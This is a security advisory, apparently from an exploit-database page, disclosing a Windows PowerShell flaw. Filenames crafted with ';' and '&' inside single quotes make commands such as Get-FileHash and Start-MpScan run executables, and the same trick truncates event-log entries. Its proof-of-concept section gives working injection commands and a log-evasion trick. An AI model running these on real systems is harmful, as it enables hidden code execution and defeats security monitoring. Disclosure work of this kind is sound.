Windows powershell event log bypass single quote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-03-03 | Type : local | Platform : windows_x86-64


[+] Code ...

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.


[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass


[CVE Reference]
N/A


[Security Issue]
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that is until now.

[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.

Take the following three test cases using Defender API which takes a specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"

1) Double quotes OK
"Test;saps DOOM;.xml"

2) Single quotes FAILS
'Test;saps DOOM;.xml'

3) Single quotes BYPASS
'Test&DOOM;.xml'

PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here
and that it also excludes the .EXE portion in that filename.


[PS Event Log Bypass]
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)
C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=25

HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682


[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":
C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5

Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'


[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx